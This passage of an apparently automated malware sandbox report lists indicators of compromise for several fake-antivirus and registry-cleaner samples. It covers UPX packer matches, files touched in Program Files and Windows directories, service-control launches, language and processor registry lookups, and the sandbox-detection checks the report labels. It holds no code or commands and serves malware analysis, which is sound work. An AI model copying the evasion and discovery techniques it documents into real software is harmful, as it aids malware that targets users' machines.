resource yara_rule behavioral1/files/0x00080000000285db-3965.dat upx behavioral1/memory/2988-3976-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/3100-3984-0x0000000000400000-0x000000000040D000-memory.dmp upx behavioral1/memory/2988-3988-0x0000000000400000-0x0000000000410000-memory.dmp upx behavioral1/memory/3100-4002-0x0000000000400000-0x000000000040D000-memory.dmp upx behavioral1/memory/3676-4027-0x0000000000400000-0x000000000057F000-memory.dmp upx behavioral1/memory/3676-4067-0x0000000000400000-0x000000000057F000-memory.dmp upx behavioral1/memory/3676-4082-0x0000000000400000-0x000000000057F000-memory.dmp upx behavioral1/memory/3100-4502-0x0000000000400000-0x000000000040D000-memory.dmp upx behavioral1/memory/5228-4510-0x0000000000400000-0x0000000000423000-memory.dmp upx behavioral1/memory/5228-4539-0x0000000000400000-0x0000000000423000-memory.dmp upx behavioral1/memory/64-5639-0x0000000000400000-0x0000000000438000-memory.dmp upx behavioral1/memory/64-5673-0x0000000000400000-0x0000000000438000-memory.dmp upx -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-140.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-black_scale-180.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\ApothecaryLetter.dotx wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\rhp_world_icon_2x.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\share_icons.png wizard.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\VisualElements\SmallLogo.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000042\assets\assets\images\MSFT.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\hi_contrast\core_icons_highcontrast_retina.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\themes\dark\rhp_world_icon.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\adobe_sign_tag_retina.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\welcome.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\images\themes\dark\new_icons.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.scale-180.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.contrast-white_scale-180.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\core_icons.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\sign-in-2x.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\PROTTPLV.DOC wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CANYON\THMBNAIL.PNG wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\dd_arrow_small.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win-scrollbar\arrow-down.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\OneNoteLogo.scale-80.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\fill-sign-2x.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\[email protected] wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\Windows\SHELLNEW\EXCEL12.XLSX wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\Close.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\images\themes\dark\rhp_world_icon_hover.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\digsig\images\themes\dark\digsig_icons.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\MobileScanCard_Light.pdf wizard.exe File created C:\Program Files (x86)\FileFix Professional 2009\unins000.dat is-EDQVV.tmp File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\images\themes\dark\new_icons_retina.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\faf_icons.png wizard.exe File opened for modification C:\Program Files (x86)\VAV\vav.cpl [email protected] File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\faf_icons_retina.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\files_icons2x.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\QuickStyles\Classic.dotx wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogo.contrast-black_scale-100.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\selection-actions.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\edit_pdf_poster.jpg wizard.exe File created C:\Program Files (x86)\Registry Cleaner Trial\~GLH000b.TMP GLB2268.tmp File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\images\cstm_brand_preview.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-140.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\[email protected] wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\images\themes\dark\file_icons.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\ExcelLogo.scale-80.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\NewComment.White.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\TimeCard.xltx wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\themes\dark\faf_icons_retina.png wizard.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeWebView\Application\132.0.2957.140\VisualElements\LogoCanary.png wizard.exe File opened for modification C:\Program Files\Google\Chrome\Application\133.0.6943.60\VisualElements\SmallLogo.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\FirstRunLogoSmall.contrast-black_scale-180.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000027\assets\Icons\Checkmark.White.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\GRPHFLT\MS.PNG wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\upsell.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\images\themes\dark\Close2x.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\AdjacencyLetter.dotx wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\core_icons.png wizard.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\Blog.dotx wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\ccloud_retina.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\measure_poster.jpg wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\images\sfs_icons.png wizard.exe File opened for modification C:\Program Files (x86)\Microsoft\EdgeCore\133.0.3065.69\VisualElements\SmallLogoDev.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\aic_file_icons_retina_thumb.png wizard.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\img\sample-thumb.png wizard.exe -
Drops file in Windows directory 64 IoCs
description ioc Process File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.1202_none_8f7e37524c3e1a13\Contact.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-s..ets.icons.searchapp_31bf3856ad364e35_10.0.19041.1_none_ceba36fd1b479c4c\SmallTile.scale-150.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-sechealthui.appxmain_31bf3856ad364e35_10.0.19041.4355_none_27aabcbd933840e6\Square71x71Logo.contrast-white_scale-400.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-ui-shell-component_31bf3856ad364e35_10.0.19041.4355_none_c25ba12abfc23968\PasswordExpiry.scale-125.png wizard.exe File opened for modification C:\Windows\ImmersiveControlPanel\images\TinyTile.contrast-black_scale-125.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.4474_none_08f8dfcf0c193741\NarratorUWPSquare150x150Logo.scale-200_contrast-black.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-p..riencehost.appxmain_31bf3856ad364e35_10.0.19041.4355_none_5679b6b84fd38b80\Square150x150Logo.scale-200.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-shell-wallpaper-theme1_31bf3856ad364e35_10.0.19041.1_none_8ccb1090444b78d3\img1.jpg wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-t..honyinteractiveuser_31bf3856ad364e35_10.0.19041.906_none_a6600355b5f69459\AnswerWithVideo.scale-300.png wizard.exe File opened for modification C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorUWPSquare44x44Logo.targetsize-48_contrast-white.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-c..ngshellapp.appxmain_31bf3856ad364e35_10.0.19041.746_none_0b4ed891dd9ccbc8\Splashscreen.scale-150_contrast-black.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.4474_none_8f6f71a24c482e0d\logo.scale-100_altform-lightunplated.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.423_none_72535ca9b59a9515\NarratorUWPSplashScreen.scale-125_contrast-white.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.423_none_72535ca9b59a9515\NarratorUWPSquare44x44Logo.targetsize-48_altform-unplated_contrast-black.png wizard.exe File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\debugger\Breakpoints\images\breakpointUnbound.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.3636_none_3473be4cdeacc98a\eventBreakpointUnbound.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-mediaplayer-core_31bf3856ad364e35_10.0.19041.4355_none_8023e2e90453f02c\DMR_48.jpg wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-s..ets.icons.searchapp_31bf3856ad364e35_10.0.19041.3996_none_8d465235315175e4\AppListIcon.targetsize-20.png wizard.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1832_1923883486\Part-ZH msedge.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-c..er.appxmain.ratings_31bf3856ad364e35_10.0.19041.1_none_ff46bbc9afee54c5\RatingStars37.contrast-white_scale-200.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\clearResults.png wizard.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1832_1260802015\edge_confirmation_page_validator.js msedge.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\MediumTile.scale-150.png wizard.exe File opened for modification C:\Windows\SystemApps\Windows.CBSPreview_cw5n1h2txyewy\Assets\Wide310x150Logo.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-c..ngshellapp.appxmain_31bf3856ad364e35_10.0.19041.4355_none_a20fad8f3407bd9a\StoreLogo.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.1202_none_8f7e37524c3e1a13\logo.scale-200_altform-lightunplated.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.423_none_72535ca9b59a9515\NarratorUWPStoreLogo.scale-150.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-s..okerplugin.appxmain_31bf3856ad364e35_10.0.19041.1202_none_d081f9868ac0a804\PasswordExpiry.scale-125.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-u..usnotificationuxexe_31bf3856ad364e35_10.0.19041.1266_none_e8d910c7c702b558\Snooze_80.contrast-black.png wizard.exe File opened for modification C:\Windows\SystemApps\microsoft.windows.narratorquickstart_8wekyb3d8bbwe\assets\NarratorUWPSquare44x44Logo.scale-150_contrast-white.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.1202_none_8f7e37524c3e1a13\logo.scale-400.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.423_none_72535ca9b59a9515\NarratorUWPSquare150x150Logo.scale-125_contrast-white.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-ui-shell-component_31bf3856ad364e35_10.0.19041.746_none_2b9acc2d69574796\RequestedDownloadsCloudIcon.scale-100.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.4474_none_fb628aaf7e87b8df\n\CBS\InputApp\Assets\StoreLogo.scale-125.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-usertiles-client_31bf3856ad364e35_10.0.19041.1_none_df86f0e7b84bf07b\guest.png wizard.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1832_1129917049\_metadata\verified_contents.json msedge.exe File opened for modification C:\Windows\SystemApps\Windows.CBSPreview_cw5n1h2txyewy\Assets\Square44x44Logo.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-onecoreua..uetooth-userservice_31bf3856ad364e35_10.0.19041.4355_none_7d386358577fd782\KeyboardSystemToastIcon.contrast-white.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-a..ntscontrol.appxmain_31bf3856ad364e35_10.0.19041.423_none_6c3451a09cba3850\SplashScreen.Theme-Dark_Scale-180.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.3636_none_3473be4cdeacc98a\i_info.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-s..riencehost.appxmain_31bf3856ad364e35_10.0.19041.4474_none_718bd205b42eef79\Logo.scale-100.png wizard.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\Assets\Icons\contrast-white\AppListIcon.targetsize-48.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-i..ntrolpanel.appxmain_31bf3856ad364e35_10.0.19041.4474_none_8f6f71a24c482e0d\TinyTile.scale-100.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.423_none_72535ca9b59a9515\NarratorUWPSquare44x44Logo.targetsize-40_contrast-black.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.4474_none_08f8dfcf0c193741\NarratorUWPSquare44x44Logo.targetsize-40.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.4474_none_fb628aaf7e87b8df\CBS\Assets\SquareLogo44x44.scale-200.png wizard.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1832_1254744504\json\i18n-hub\hu\strings.json msedge.exe File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\common\images\colorPicker\hueColorBar.png wizard.exe File opened for modification C:\Windows\SystemApps\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Assets\Square44x44Logo.targetsize-44_contrast-white.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-fileexplorer.appxmain_31bf3856ad364e35_10.0.19041.546_none_476476bb5c3a0bbc\SquareTile44x44.targetsize-48_altform-unplated_contrast-white_devicefamily-colorfulunplated.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-u..usnotificationuxexe_31bf3856ad364e35_10.0.19041.1266_none_e8d910c7c702b558\OkDone_80.png wizard.exe File opened for modification C:\Windows\SystemApps\Microsoft.MicrosoftEdgeDevToolsClient_8wekyb3d8bbwe\23\network\Images\NetworkStatus-Warning.png wizard.exe File opened for modification C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\WindowsBackup\Assets\AppList.scale-200.png wizard.exe File opened for modification C:\Windows\SystemResources\Windows.UI.Shell\Images\Icon_MMXresume.contrast-white_scale-200.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-n..quickstart.appxmain_31bf3856ad364e35_10.0.19041.423_none_72535ca9b59a9515\NarratorUWPSquare44x44Logo.targetsize-256_altform-unplated_contrast-black.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-shell32_31bf3856ad364e35_10.0.19041.4529_none_e0ca4ed1c74976b7\DesktopSpotlightToastIcon.scale-125_theme-light.png wizard.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1832_1254744504\json\i18n-tokenized-card\ar\strings.json msedge.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-e..ifiedwritefilter-ux_31bf3856ad364e35_10.0.19041.746_none_c7c6fccae233c8b7\ResetDriveSquare44x44Logo.scale-100.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.3636_none_3473be4cdeacc98a\deleteAll.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-userexperience-desktop_31bf3856ad364e35_10.0.19041.4474_none_fb628aaf7e87b8df\n\CBS\WindowsBackup\Assets\StoreLogo.scale-125.png wizard.exe File created C:\Windows\SystemTemp\chrome_Unpacker_BeginUnzipping1832_1254744504\json\i18n-hub\id\strings.json msedge.exe File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ASP.NETWebAdminFiles\Images\darkBlue_GRAD.jpg wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-c..er.appxmain.ratings_31bf3856ad364e35_10.0.19041.1_none_ff46bbc9afee54c5\RatingStars33.contrast-black_scale-200.png wizard.exe File opened for modification C:\Windows\WinSxS\amd64_microsoft-windows-m..oolsclient.appxmain_31bf3856ad364e35_10.0.19041.423_none_9de80b9d881a1ebd\saveicon.png wizard.exe -
Launches sc.exe 4 IoCs
Sc.exe is a Windows utlilty to control services on the system.
pid Process 5684 sc.exe 4940 sc.exe 5784 sc.exe 1388 sc.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Program crash 5 IoCs
pid pid_target Process procid_target 4708 1556 WerFault.exe 259 1848 4080 WerFault.exe 266 2296 1948 WerFault.exe 283 4480 2724 WerFault.exe 292 6036 2780 WerFault.exe 201 -
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x2s443bc.cs1.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language is-EDQVV.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RegClean.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Box.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language avpc2009.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NavaDebugger.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ska2pwej.aeh.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NavaBridge.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language AcroRd32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloadly_installer.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MassiveInstaller.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language regsvr32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MassiveInstaller.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language wizard.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language NavaShield.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language walliant.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language downloadly_installer.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language sc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language Endermanch@RegistryCleaner_SOReferral.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language rundll32.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ska2pwej.aeh.tmp Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language vbvxcn.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskkill.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language walliant.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language net1.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language [email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language RdrCEF.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language x2s443bc.cs1.exe -
Checks processor information in registry 2 TTPs 8 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 AcroRd32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz AcroRd32.exe Key created \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 NavaShield.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString NavaShield.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier msedge.exe -
Enumerates system info in registry 2 TTPs 6 IoCs
